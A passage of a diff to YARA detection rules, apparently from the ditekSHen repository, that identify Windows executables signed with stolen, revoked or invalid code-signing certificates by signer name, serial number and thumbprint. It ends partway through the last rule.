+rule DITEKSHEN_INDICATOR_KB_CERT_387Eeb89B8Bf626Bbf4C7C9F5B998B40 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "465d0b0c-c9fa-5364-a5f4-0d765ee40081"
+		id = "56dfc1b5-3aba-5c21-93e6-85d41a2a4415"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L640-L651"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7281-L7293"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1720636723f0eeab074e29e7c9bf2df3c8d951e27b25ea4b7db60f6c00102589"
+		logic_hash = "3436b7954e5488614f8f0998fe9eae7773d821c776436836d7b2230cd9c97f46"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9a17d31e9191644945e920bc1e7e08fbd00b62f4"
+		thumbprint = "e94ad249747fd4b88750b2cd6d8d65ad33d3566d"
+		hash1 = "004f011b37e4446fa04b76aae537cc00f6588c0705839152ae2d8a837ef2b730"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SEVA MEDICAL LTD" and pe.signatures [ i ] . serial == "59:e3:78:99:4c:f1:c0:02:27:64:89:6d:82:6e:6b:b8" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ULTRA ACADEMY LTD" and pe.signatures [ i ] . serial == "38:7e:eb:89:b8:bf:62:6b:bf:4c:7c:9f:5b:99:8b:40" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3D2580E89526F7852B570654Efd9A8Bf : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_035B41766660B08Aaf121536F0D83D4D : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects signed excutable of DiskCryptor open encryption solution that offers encryption of all disk partitions"
 		author = "ditekSHen"
-		id = "a80493e6-ed0c-597a-a87e-19c8fa8dd8ce"
+		id = "80c803e1-16b8-583d-9d4f-3a0f693c9e24"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L668-L679"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7295-L7306"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "19f418672850536aaac1983b45c3239d5c81c1e4b9b6ee36a761cfc7e2351531"
+		logic_hash = "924ed1d3c6a8d378471a2e5301f3a813ee8622135ce001d3061918d9454cdcc4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c1b4d57a36e0b6853dd38e3034edf7d99a8b73ad"
+		thumbprint = "2022d012c23840314f5eeaa298216bec06035787"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MIKL LIMITED" and pe.signatures [ i ] . serial == "3d:25:80:e8:95:26:f7:85:2b:57:06:54:ef:d9:a8:bf" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Alexander Lomachevsky" and pe.signatures [ i ] . serial == "03:5b:41:76:66:60:b0:8a:af:12:15:36:f0:d8:3d:4d" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_5Da173Eb1Ac76340Ac058E1Ff4Bf5E1B : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_1A041Db92237C18948109789F627B3Cd : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1ef8f8b6-e4e9-5504-94bd-b24e81de5694"
+		id = "0a5a6b19-0fbe-5e0c-bfb1-ca201207f6c7"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L681-L692"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7308-L7320"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c9bfbef4470ee2339ef68484f8a4f21628c0cf9a07770d68d91e6c11e0345786"
+		logic_hash = "f5e07eb58a68dea062522869c43daeddab666f12b078a4f2ce9aa37885e46cbd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "acb38d45108c4f0c8894040646137c95e9bb39d8"
+		thumbprint = "2315cf802aaf96d11f18766315239016e533bf32"
+		hash1 = "a0338becbfe808bc7655d8b6c825e2e99b37945e5d8fc43a83aec479d64f422d"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALISA LTD" and pe.signatures [ i ] . serial == "5d:a1:73:eb:1a:c7:63:40:ac:05:8e:1f:f4:bf:5e:1b" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Amitotic" and pe.signatures [ i ] . serial == "1a:04:1d:b9:22:37:c1:89:48:10:97:89:f6:27:b3:cd" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_378D5543048E583A06A0819F25Bd9E85 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_06Df5C318759D6Ea9D090Bfb2Faf1D94 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3525888c-9558-5164-b94e-b16511a5ea72"
+		id = "8c1f226f-6fc0-5136-ac19-7d88d7505a8e"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L694-L705"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7322-L7334"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "29c6ae99675b8ab2c497faad71791c3fc018e92447bd96f5b2b3f426e1a1322b"
+		logic_hash = "3be08901a44c1c94cfb93e56075270ed974399ccc0a4dce15299456dad645822"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "cf933a629598e5e192da2086e6110ad1974f8ec3"
+		thumbprint = "4418e9a7aab0909fa611985804416b1aaf41e175"
+		hash1 = "47dbb2594cd5eb7015ef08b7fb803cd5adc1a1fbe4849dc847c0940f1ccace35"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KITTY'S LTD" and pe.signatures [ i ] . serial == "37:8d:55:43:04:8e:58:3a:06:a0:81:9f:25:bd:9e:85" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SpiffyTech Inc." and pe.signatures [ i ] . serial == "06:df:5c:31:87:59:d6:ea:9d:09:0b:fb:2f:af:1d:94" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Fdb6F4C09A1Ad69D4Fd2E46Bb1F54313 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_330000026551Ae1Bbd005Cbfbd000000000265 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e1250c37-fa89-5b8e-bea2-3b5e14039aea"
+		id = "7f86e427-110f-5bcc-bb53-ca534f7444fc"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L720-L731"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7337-L7351"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ce78ab52d8aeb87ada9cb86007907a8ad46e91982cc8fff43a61e7ec96609eb2"
+		logic_hash = "ae836069665d088c6a309efe5166e260836dce6398c51701b2274515bdaa2cbd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4d1bc69003b1b1c3d0b43f6c17f81d13e0846ea7"
+		thumbprint = "e168609353f30ff2373157b4eb8cd519d07a2bff"
+		hash1 = "a471fdf6b137a6035b2a2746703cd696089940698fd533860d34e71cc6586850"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FDSMMCME" and pe.signatures [ i ] . serial == "fd:b6:f4:c0:9a:1a:d6:9d:4f:d2:e4:6b:b1:f5:43:13" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Windows" and pe.signatures [ i ] . issuer contains "Microsoft Windows Production PCA 2011" and pe.signatures [ i ] . serial == "33:00:00:02:65:51:ae:1b:bd:00:5c:bf:bd:00:00:00:00:02:65" and 1614796238 <= pe.signatures [ i ] . not_after )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_E5Bf5B5C0880Db96477C24C18519B9B9 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_309368B122Ab63103Dddd4Ad6321A82C : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a28dbf8f-1b30-525d-baaf-51342aaf1cb3"
+		id = "a9c2fa86-506e-503a-a864-8368f63662c4"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L733-L744"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7353-L7365"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b3e0401a9cf3005abac24114193f34bf439107bf6661b7c2c0b66ca91438c7b9"
+		logic_hash = "37a39d63e2bce6d4ce501e3032ee12fe8c5b39e8d8cb0f3e0c6d0be375bcffc8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = ""
+		thumbprint = "1370de077e2ba2065478dee8075b16c0e5a5e862"
+		hash1 = "b7376049b73feb5bc677a02e4040f2ec7e7302456db9eac35c71072dd95557eb"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WATWGHFC" and pe.signatures [ i ] . serial == "e5:bf:5b:5c:08:80:db:96:47:7c:24:c1:85:19:b9:b9" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Systems Accounting Limited" and pe.signatures [ i ] . serial == "30:93:68:b1:22:ab:63:10:3d:dd:d4:ad:63:21:a8:2c" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ede6Cfbf9Fa18337B0Fdb49C1F693020 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_19F613Cf951D49814250701037442Ee2 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f1f34147-132e-53a3-b82c-d98121fc3f2c"
+		id = "780c515e-811c-5f44-97a2-9ed93a7d9d89"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L746-L757"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7367-L7384"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "27f06a7a07b818fd34f5d23fd8e78f041063e035c1f8caa99aaaf53ec73a717a"
+		logic_hash = "1ea5f770ddbb7dba836049bec0c7b73cd5bc6a87514f8ea00288cb9d52d17651"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a99b52e0999990c2eb24d1309de7d4e522937080"
+		thumbprint1 = "6feab07fa782fc7fbddde8465815f4d04d79ad97"
+		thumbprint2 = "41aaafa56a30badb291e96d31ed15a9343ba7ed3"
+		hash1 = "9629cae6d009dadc60e49f5b4a492bd1169d93f17afa76bee27c37be5bca3015"
+		hash2 = "3b3281feef6d8e0eda2ab7232bd93f7c747bee143c2dfce15d23a1869bf0eddf"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "START ARCHITECTURE LTD" and pe.signatures [ i ] . serial == "00:ed:e6:cf:bf:9f:a1:83:37:b0:fd:b4:9c:1f:69:30:20" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cooler Master" and ( pe.signatures [ i ] . serial == "19:f6:13:cf:95:1d:49:81:42:50:70:10:37:44:2e:e2" or pe.signatures [ i ] . serial == "6b:e8:ee:f0:82:a4:f5:96:4c:75:0b:c0:07:24:f6:4a" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4F407Eb50803845Cc43937823E1344C0 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_2D8Cfcf04209Dc7F771D8D18E462C35A : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d5a6df76-bbbc-5025-b0c4-49e0034c03f3"
+		id = "6b2b25af-dae5-5055-851d-e515f6beee58"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L759-L770"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7386-L7398"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bb01e912cf40155b0b00e1901bbb3235048ee033d0ddea7a809f0ce8e871e1ce"
+		logic_hash = "e7eee6a6593c231c193145eeefd03a0f32c1d8cc103c97cfa26b5af7363c9b08"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0c1ffe7df27537a3dccbde6f7a49e38c4971e852"
+		thumbprint = "a9c61e299634ba01e269239de322fb85e2da006b"
+		hash1 = "af27173ed576215bb06dab3a1526992ee1f8bd358a92d63ad0cfbc0325c70acf"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLOW COOKED VENTURES LTD" and pe.signatures [ i ] . serial == "4f:40:7e:b5:08:03:84:5c:c4:39:37:82:3e:13:44:c0" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AA PLUS INVEST d.o.o." and pe.signatures [ i ] . serial == "2d:8c:fc:f0:42:09:dc:7f:77:1d:8d:18:e4:62:c3:5a" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_2Bffef48E6A321B418041310Fdb9B0D0 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_06De439Ba2Df4Dcd8240C211D60Cdf5E : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "fc945c76-b743-52d3-8e15-77afdc629f6d"
+		id = "90623074-58ac-51fd-9b80-881d3187dc74"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L785-L796"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7400-L7412"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8d0223b6366f7bc22fd6dd053c1fb6c9e52f80b3bdf9ee46017ddf038bd1e00f"
+		logic_hash = "a2847853e2e9cc9e6909871b3f8e6de399fb76353e997b084c92dbcfe6c1a48f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c40c5157e96369ceb7e26e756f2d1372128cee7b"
+		thumbprint = "2650a1205bd7720381c00bdee5aede0ee333dc13"
+		hash1 = "e3bc81a59fc45dfdfcc57b0078437061cb8c3396e1d593fcf187e3cdf0373ed1"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "A&D DOMUS LIMITED" and pe.signatures [ i ] . serial == "2b:ff:ef:48:e6:a3:21:b4:18:04:13:10:fd:b9:b0:d0" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microleaves LTD" and pe.signatures [ i ] . serial == "06:de:43:9b:a2:df:4d:cd:82:40:c2:11:d6:0c:df:5e" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_73B60719Ee57974447C68187E49969A2 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00F454F2Fdc800B3454059D8889Bd73D67 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c72fb0b8-efdc-5734-9754-2289bd95ae3c"
+		id = "277ac503-91c4-5266-b8a4-c01a48b8df4d"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L798-L809"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7414-L7429"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f9cc0f526a3acbfc30c6b76b6705f1a2d9c905b9bb7c996e4db3ca6d4d63be1c"
+		logic_hash = "91b33a3e915a007d00482905471e124045a373fef9c8b0fe9a987196d2ec013a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8e50ddad9fee70441d9eb225b3032de4358718dc"
+		thumbprint = "2b560fabc34e0db81dae1443b1c4929eef820266"
+		hash1 = "e58b80e4738dc03f5aa82d3a40a6d2ace0d7c7cfd651f1dd10df76d43d8c0eb3"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIT HORIZON LIMITED" and pe.signatures [ i ] . serial == "73:b6:07:19:ee:57:97:44:47:c6:81:87:e4:99:69:a2" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BEAUTY CORP SRL" and ( pe.signatures [ i ] . serial == "f4:54:f2:fd:c8:00:b3:45:40:59:d8:88:9b:d7:3d:67" or pe.signatures [ i ] . serial == "00:f4:54:f2:fd:c8:00:b3:45:40:59:d8:88:9b:d7:3d:67" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_2925263B65C7Fe1Cd47B0851Cc6951E3 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_3Afe693728F8406054A613F6736F89E3 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9e531592-b68c-550b-8609-51f7c9ac63ae"
+		id = "64c4157e-2183-5f41-b938-df29e210ee80"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L811-L822"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7431-L7443"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "163293ce805cdd3ec265fb9c527a5ce19ddab0f6b96355acb636c941ce0bc5f2"
+		logic_hash = "6993a13546a1eff8a4f770f224a14bffe7e3393f628337cff27cbf57ebab2a65"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "88ef10f0e160b1b4bb8f0777a012f6b30ac88ac8"
+		thumbprint = "89528e9005a635bcee8da5539e71c5fc4f839f50"
+		hash1 = "d98bdf3508763fe0df177ef696f5bf8de7ff7c7dc68bb04a14a95ec28528c3f9"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "tuning buddy limited" and pe.signatures [ i ] . serial == "29:25:26:3b:65:c7:fe:1c:d4:7b:08:51:cc:69:51:e3" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ROB ALDERMAN FITNESS LIMITED" and pe.signatures [ i ] . serial == "3a:fe:69:37:28:f8:40:60:54:a6:13:f6:73:6f:89:e3" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4Ff4Eda5Fa641E70162713426401F438 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0Fd7F9Cac1E9Ce71Ac757F93266E3B13 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cc81ed1d-bd77-5cec-8bee-23e8ef448edc"
+		id = "6021f566-e297-5af4-b692-663480091296"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L824-L835"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7445-L7457"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d08e12e74e9c0b7a89ffa81a1b8595953d857e571a5b7a6947eba18bf39610f6"
+		logic_hash = "319f858a15f8752d7637ab7036ed89b17c501c2422769339578e685fe6a57eea"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a6277cc8fce0f90a1909e6dac8b02a5115dafb40"
+		thumbprint = "af2779ceb127caa6c22232ad359888a0a71ce221"
+		hash1 = "7c28b994aeb3a85e37225cc20bae2232f97e23f115c2a409da31f353140c631e"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DUHANEY LIMITED" and pe.signatures [ i ] . serial == "4f:f4:ed:a5:fa:64:1e:70:16:27:13:42:64:01:f4:38" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x9D\\x92\\xE5\\xB2\\x9B\\xE4\\xB8\\x89\\xE5\\x96\\x9C\\xE8\\xB4\\xB8\\xE6\\x98\\x93\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0f:d7:f9:ca:c1:e9:ce:71:ac:75:7f:93:26:6e:3b:13" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_04C7Cdcc1698E25B493Eb4338D5E2F8B : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5Fbf16A33D26390A15F046C310030Cf0 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "446608c2-4c9e-56a9-8ac4-2c90397d68e5"
+		id = "6c010106-141d-5121-9594-73edc872a381"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L837-L848"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7459-L7471"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d1e81d040a279d6024989acbdd40f69de99c97baf789591400370806e846a1c4"
+		logic_hash = "fc68fe14ec70de74a6dae7891dfbb82ee7974f37469cfa72d735e70e9194c405"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "60974f5cc654e6f6c0a7332a9733e42f19186fbb"
+		thumbprint = "61f422db86bbc5093b1466a281f13346f8d81792"
+		hash1 = "f45e5f160a6de454d1db21b599843637103506545183a30053d03b609f92bbdc"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3AN LIMITED" and pe.signatures [ i ] . serial == "04:c7:cd:cc:16:98:e2:5b:49:3e:b4:33:8d:5e:2f:8b" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MACHINES SATU MARE SRL" and pe.signatures [ i ] . serial == "5f:bf:16:a3:3d:26:39:0a:15:f0:46:c3:10:03:0c:f0" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4C450Eccd61D334E0Afb2B2D9Bb1D812 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_292Eb1133507F42E6F36C5549C189D5E : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "116c86c1-facf-5b69-94f1-3f0f81c38a7d"
+		id = "60d3cc6e-bf58-55ae-a13b-0e22ecc8d5cd"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L850-L861"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7473-L7485"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "70851d76af4a4dfe8f1ca4de9925f030d9b937050876828775b78eddd123e3cd"
+		logic_hash = "456a09b1939d3f60e6ef735631eb681a9d15ea573552672fd14b19f60e8d8c73"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4c450eccd61d334e0afb2b2d9bb1d812"
+		thumbprint = "48c32548ff651e2aac12716efb448f5583577e35"
+		hash1 = "f0b3b36086e58964bf4b9d655568ab5c7f798bd89e7a8581069e65f8189c0b79"
 		importance = 20
 
 	condition:
